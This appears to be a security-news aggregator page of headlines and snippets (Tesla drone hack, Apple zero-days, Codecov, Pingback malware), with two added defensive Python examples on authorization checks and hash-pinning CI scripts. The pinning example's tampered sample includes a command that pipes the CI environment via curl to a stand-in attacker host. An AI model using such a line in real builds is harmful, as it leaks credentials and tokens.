Tue, May 04, 2021

Tesla Remotely Hacked from a Drone

Schneier on Security

This is an impressive hack: Security researchers Ralf-Philipp Weinmann of Kunnamon, Inc. and Benedikt Schmotzle of Comsecuris GmbH have found remote zero-click security vulnerabilities in an open-source software component (ConnMan) used in Tesla automobiles that allowed them to compromise parked cars and control their infotainment systems over WiFi.

This ambitious Microsoft project aims to fix cloud computing security

Tech Republic Security

Microsoft Research's Project Freta aims to find invisible malware running on the cloud.

Cybersecurity Fosters Competitive Advantage

Security Boulevard

Tens of billions of dollars each year are spent on cybersecurity, yet cybercriminals continue to succeed. There seems to be a never-ending stream of cybersecurity bad news. Companies constantly experience negative security events – Facebook, Verkada, and Elekta are recent examples. Cybersecurity failures become public relations, customer relations, and financial problems for companies.

Apple Fixes Zero-Day Flaws in Unscheduled iOS Update – Here’s How to Patch

Hot for Security

Apple this week issued out-of-band updates for mobile customers to patch two zero-day vulnerabilities that let attackers execute remote code on their iDevices. The Cupertino-based tech giant says criminals “may” have already exploited the flaws. Available for most iDevices in circulation, iOS 14.5.1 (and the complementary iPadOS 14.5.1) fixes a critical memory corruption issue in the Safari WebKit engine where “processing maliciously crafted web content may lead to arbitrary code execution,” acc

The Importance of User Roles and Permissions in Cybersecurity Software

How many people would you trust with your house keys? Chances are, you have a handful of trusted friends and family members who have an emergency copy, but you definitely wouldn’t hand those out too freely. You have stuff that’s worth protecting—and the more people that have access to your belongings, the higher the odds that something will go missing.

The New Wave of Cybersecurity Awareness Training

Security Boulevard

The only constant is change. The ongoing effects of COVID-19 have taught us that change is inevitable to survive. One major area that has been affected during COVID-19 is how we interact with employees, and what we need those employees to know right now. Cybersecurity is one of those critical areas of this new world.

How Cryptocurrency and Cybercrime Trends Influence One Another

Webroot

Typically, when cryptocurrency values change, one would expect to see changes in crypto-related cybercrime. In particular, trends in Bitcoin values tend to be the bellwether you can use to predict how other currencies’ values will shift, and there are usually corresponding shifts in crypto-based crime, such as ransomware, though it’s not necessarily the kind of change you might predict.

Enabling Hardware-enforced Stack Protection (cetcompat) in Chrome

Google Security

Alex Gough, Engineer, Chrome Platform Security Team

Chrome 90 for Windows adopts Hardware-enforced Stack Protection, a mitigation technology that makes exploitation of security bugs more difficult for attackers. It is supported by Windows 10 20H1 (version 2004) or later, running on processors with Control-flow Enforcement Technology (CET) such as Intel 11th Gen or AMD Zen 3 CPUs.

Facebook: Don't expect full end-to-end encryption on Messenger until 2022 'at the earliest'

Tech Republic Security

Facebook says it wants to make E2EE the default across all of its messaging platforms, but this will be a gradual process.

Microsoft will soon remove Flash Player from Windows 10 devices

We Live Security

The Patch Tuesday security update due in July should hammer the last nail in the coffin of Adobe Flash Player.

Vulnerable Dell driver puts hundreds of millions of systems at risk

Bleeping Computer

A driver that's been pushed for the past 12 years to Dell computer devices for consumers and enterprises contains multiple vulnerabilities that could lead to increased privileges on the system.

IDC Analyst Report: The Open Source Blind Spot Putting Businesses at Risk

In a recent study, IDC found that 64% of organizations said they were already using open source in software development with a further 25% planning to in the next year. Most organizations are unaware of just how much open-source code is used and underestimate their dependency on it. As enterprises grow the use of open-source software, they face a new challenge: understanding the scope of open-source software that's being used throughout the organization and the corresponding exposure.

Boystown, dark web child abuse image website with 400,000 members, shut down by police

Graham Cluley

Police have shut down Boystown, one of the world's largest child abuse image websites, following an investigation that saw authorities across the globe work together to identify and apprehend those responsible for its creation and maintenance.

Worldwide phishing attacks deliver three new malware strains

Bleeping Computer

A global-scale phishing campaign targeted worldwide organizations across a large array of industries with never-before-seen malware strains delivered via specially-tailored lures.

CSO50 2021 awards showcase world-class security strategies

CSO Magazine

The CSO50 awards recognize security projects that demonstrate outstanding thought leadership and business value. The awards are scored according to a uniform set of criteria by a panel of judges that includes security leaders, industry experts, and academics. It is an opportunity for security leaders to share with their peers the risk and security innovations that led the way to greater success for their organizations.

Tesla's Elon Musk to offer satellite-based internet that cannot be hacked

CyberSecurity Insiders

Electric-car tycoon Elon Musk has announced that no hacker in the world can hack his Starlink satellite internet service, at least with the currently available technological tools. Musk shared the news on Twitter and added that SpaceX's satellite internet service will apparently be available by the end of this year, provided all goes well with the R&D team.

Cybersecurity Predictions for 2024

Within the past few years, ransomware attacks have turned to critical infrastructure, healthcare, and government entities. Attackers have taken advantage of the rapid shift to remote work and new technologies. Add to that hacktivism due to global conflicts and U.S. elections, and an increased focus on AI, and you have the perfect recipe for a knotty and turbulent 2024.

Experian API Leaked Credit Scores

Security Boulevard

After Experian fixed a weakness at a partner website that let anyone view credit scores for nearly every American by just inputting a name and address, questions remain about whether the same problem exists with other partners, and how widespread the problem might be. A security researcher and college student, Bill Demirkapi, stumbled across the.
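
The pattern described above, a lookup keyed only on a name and an address, is a missing authorization check rather than a bug in any one library. The following is an added example, not Experian's or the partner's code: a hypothetical score service with the weak lookup beside a version that releases a record only to the authenticated subject it belongs to. The records, names and the `login`/`SESSIONS` plumbing are constructed for illustration.

```python
import secrets

# Constructed sample data; every name and address here is fictitious.
RECORDS = {
    "cust-1001": {"name": "Alice Example", "address": "1 Main St, Springfield", "score": 712},
    "cust-1002": {"name": "Bob Example", "address": "2 Oak Ave, Shelbyville", "score": 655},
}


class AuthzError(Exception):
    """Raised when the caller is not entitled to the requested record."""


def lookup_score_vulnerable(name: str, address: str):
    """The pattern the article describes: name + address act as the only 'credential'.

    Both values are public or cheaply guessable, so this is effectively an
    unauthenticated endpoint that lets anyone enumerate everyone's score.
    """
    for record in RECORDS.values():
        if record["name"] == name and record["address"] == address:
            return record["score"]
    return None


# Hardened version (hypothetical design): a score is released only to its owner.
SESSIONS = {}  # session token -> customer id, created only after identity verification


def login(customer_id: str) -> str:
    """Issue a session token; identity proofing is assumed to have happened before this."""
    if customer_id not in RECORDS:
        raise AuthzError("unknown customer")
    token = secrets.token_urlsafe(32)
    SESSIONS[token] = customer_id
    return token


def lookup_score_hardened(session_token: str, requested_customer_id: str) -> int:
    """Return a score only if the authenticated subject owns the requested record.

    The subject comes from the server-side session, never from the request body,
    and the authorization decision is explicit instead of being implied by the
    caller knowing some identifying details.
    """
    subject = SESSIONS.get(session_token)
    if subject is None:
        raise AuthzError("not authenticated")
    if subject != requested_customer_id:
        raise AuthzError("not authorized for this record")
    return RECORDS[subject]["score"]


if __name__ == "__main__":
    print("vulnerable:", lookup_score_vulnerable("Alice Example", "1 Main St, Springfield"))
    token = login("cust-1001")
    print("hardened, own record:", lookup_score_hardened(token, "cust-1001"))
    try:
        lookup_score_hardened(token, "cust-1002")
    except AuthzError as exc:
        print("hardened, someone else's record:", exc)
```

The cleanest design drops the `requested_customer_id` parameter entirely and derives the record from the session alone, so there is no client-controlled identifier to tamper with; the explicit comparison is kept here to make the authorization decision visible. Whatever the design, a partner integration that exposes PII-keyed lookups needs the same check on the partner side, which is the open question the article raises.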

5 key qualities of successful CISOs, and how to develop them

CSO Magazine

The role of the CISO is relatively immature in comparison to other, longer standing C-level business positions such as CEO, COO, or CFO, but it has evolved significantly in just the last few years alone. Today’s CISOs are required to be somewhat different from the traditional security leaders of the past, and that is reflective of two things: the vital and growing role data plays in the everyday running of a business and increased expectations of the security function to keep that data safe and

New Windows 'Pingback' malware uses ICMP for covert communication

Bleeping Computer

Today, Trustwave researchers have disclosed their findings on a novel Windows malware sample that uses Internet Control Message Protocol (ICMP) for its command-and-control (C2) activities. Dubbed "Pingback," this malware targets Windows 64-bit systems, and uses DLL Hijacking to gain persistence.

Cloud adoption is accelerating, but cloud security might be an issue

Tech Republic Security

The problem is not the cloud, one expert said. It's the speed at which companies are moving items to the cloud without considering security controls.

Beware of Pixels & Trackers on U.S. Healthcare Websites

The healthcare industry has massively adopted web tracking tools, including pixels and trackers. Tracking tools on user-authenticated and unauthenticated web pages can access personal health information (PHI) such as IP addresses, medical record numbers, home and email addresses, appointment dates, or other info provided by users on pages and thus can violate HIPAA Rules that govern the Use of Online Tracking Technologies by HIPAA Covered Entities and Business Associates.

8 top identity and access management tools

CSO Magazine

The days of perimeter security acting as the core of cybersecurity defenses are long gone. No organization would be caught without firewalls and antivirus scanners to catch low-sophistication attacks, but the real battle to protect the network has moved to the realm of identity and access management (IAM).

A massive DDoS knocked offline Belgian government websites

Security Affairs

A massive distributed denial of service (DDoS) attack shut down Belgium's government websites; internal networks were also impacted. According to media reports, the attack hit most of the Belgian government's IT network and knocked internal systems offline as well. People attempting to visit websites hosted on the Belnet network could not reach them and were shown error messages.

Then a Hacker Began Posting Patients’ Deepest Secrets Online

WIRED Threat Level

A family-run psychotherapy startup grew into a health care giant. It was a huge success—until the data breach and the anonymous ransom notes sent to clients.

Twilio discloses impact from Codecov supply-chain attack

Bleeping Computer

Cloud communications company Twilio has now disclosed that the recent Codecov supply-chain attack exposed a small number of Twilio's customer email addresses.
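
The Codecov incident reached downstream companies such as Twilio through CI jobs that fetched and ran a script whose contents had been altered upstream (that mechanism comes from the public incident reports, not from the snippet above). The practitioner check is to pin the digest of a reviewed copy of any such script in the repository and refuse to execute a download that does not match. The following is an added example, not Codecov's or Twilio's code: the two script bodies are constructed here, the `record_pin`/`verify_pin`/`run_if_verified` names are this example's own, and the `runner` parameter exists so the decision can be exercised without spawning a shell.

```python
import hashlib
import hmac
import os
import subprocess
import tempfile


def sha256_hex(content: bytes) -> str:
    return hashlib.sha256(content).hexdigest()


def record_pin(reviewed_content: bytes) -> str:
    """Maintainer step, done once: digest a copy a human reviewed and commit the hex."""
    return sha256_hex(reviewed_content)


def verify_pin(content: bytes, pinned_hex: str) -> bool:
    """CI step: compare the freshly downloaded bytes against the committed pin."""
    return hmac.compare_digest(sha256_hex(content), pinned_hex.lower())


def run_if_verified(content: bytes, pinned_hex: str, runner=subprocess.run) -> bool:
    """Write the script to a temporary file and execute it only when the pin matches.

    Returns True if the script ran and False if it was rejected. `runner` is
    injectable (default: subprocess.run) so the gate can be tested offline.
    """
    if not verify_pin(content, pinned_hex):
        return False
    fd, path = tempfile.mkstemp(suffix=".sh")
    try:
        with os.fdopen(fd, "wb") as fh:
            fh.write(content)
        os.chmod(path, 0o700)
        runner([path], check=True)
    finally:
        os.unlink(path)
    return True


# Constructed sample: a reviewed uploader script and a tampered copy that appends
# a line leaking the CI environment (where tokens usually live) to another host.
CLEAN_SCRIPT = b"#!/bin/sh\ncurl -s -F coverage=@coverage.xml https://example.invalid/upload\n"
TAMPERED_SCRIPT = CLEAN_SCRIPT + b"env | curl -s -X POST --data-binary @- https://attacker.invalid/\n"
PINNED = record_pin(CLEAN_SCRIPT)

if __name__ == "__main__":
    print("clean copy verifies:", verify_pin(CLEAN_SCRIPT, PINNED))
    print("tampered copy verifies:", verify_pin(TAMPERED_SCRIPT, PINNED))
```

The pin has to live with the code that uses it (committed, reviewed in pull requests) and be bumped deliberately when a new version is adopted; fetching a script from a mutable URL and piping it straight into a shell verifies nothing. A detached signature from the vendor is stronger still, at the cost of managing the signing key.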

5 Key Findings From the 2023 FBI Internet Crime Report

The losses companies suffered in 2023 ransomware attacks increased by 74% compared to those of the previous year, according to new data from the Federal Bureau of Investigation (FBI). The true figure is likely to be even higher, though, as many identity theft and phishing attacks go unreported. Ransomware attackers can potentially paralyze not just private sector organizations but also healthcare facilities, schools, and entire police departments.

Choose Your Own Adventure game animates security awareness training

SC Magazine

Infosec’s Choose Your Own Adventure training game “Deep Space Danger” tests employees on their knowledge of social engineering. The employees at your organization are badly in need of security awareness training. What do you do? A. Bore them with dull content that feels like a lecture. B. Engage them with gamified, interactive lessons. “B” is obviously the correct choice, but not all companies succeed in motivating their workers to learn the ins and outs of phishing

Australia’s Proposed Curriculum Aims to Teach Five-Year-Olds About Online Privacy and Cybersecurity

Hot for Security

The latest revised draft of Australia’s primary school curriculum proposes to teach students about cybersecurity from the age of five. The newly proposed curriculum for children aged five to 16 includes a new strand indicating a new discipline, “Considering privacy and security”, that “involves students developing appropriate techniques for managing data, which is personal, and effectively implementing security protocols.”

Expert: The cloud is more secure than on-prem, but the speed of adoption is making it less so

Tech Republic Security

Companies are accelerating their use of the cloud, but should slow down and make sure security is built in from the beginning.

U.S. Agency for Global Media data breach caused by a phishing attack

Bleeping Computer

The U.S. Agency for Global Media (USAGM) has disclosed a data breach that exposed the personal information of current and former employees and their beneficiaries.

Software Composition Analysis: The New Armor for Your Cybersecurity

Speaker: Blackberry, OSS Consultants, & Revenera

Software is complex, which makes threats to the software supply chain more real every day. 64% of organizations have been impacted by a software supply chain attack and 60% of data breaches are due to unpatched software vulnerabilities. In the U.S. alone, cyber losses totaled $10.3 billion in 2022. All of these stats beg the question, “Do you know what’s in your software?

Spectre attacks come back from the dead

Malwarebytes

Spectre is the name for a whole class of vulnerabilities discovered in January 2018 that affected huge numbers of modern computer processors that rely on a performance feature called speculative execution. Since then, some of the world’s most talented computer scientists from industry and academia have worked on software patches and hardware defenses.

DOD expands bug disclosure program to all publicly accessible systems

Bleeping Computer

US Department of Defense (DOD) officials today announced that the department's Vulnerability Disclosure Program (VDP) has been expanded to include all publicly accessible DOD websites and applications.

Global Phishing Attacks Spawn Three New Malware Strains

Threatpost

The never-seen malware strains have "professionally coded sophistication" and were launched by a well-resourced APT using nearly 50 domains, one hijacked.

Google Chrome adopts Windows 10 exploit protection feature

Bleeping Computer

Google Chrome now hinders attackers' efforts to exploit security bugs on systems with Intel 11th Gen or AMD Zen 3 CPUs, running Windows 10 2004 or later.

From Complexity to Clarity: Strategies for Effective Compliance and Security Measures

Speaker: Erika R. Bales, Esq.

When we talk about “compliance and security," most companies want to ensure that steps are being taken to protect what they value most – people, data, real or personal property, intellectual property, digital assets, or any number of other things – and it’s more important than ever that safeguards are in place. Let’s step back and focus on the idea that no matter how complicated the compliance and security regime, it should be possible to distill it down to a checklist.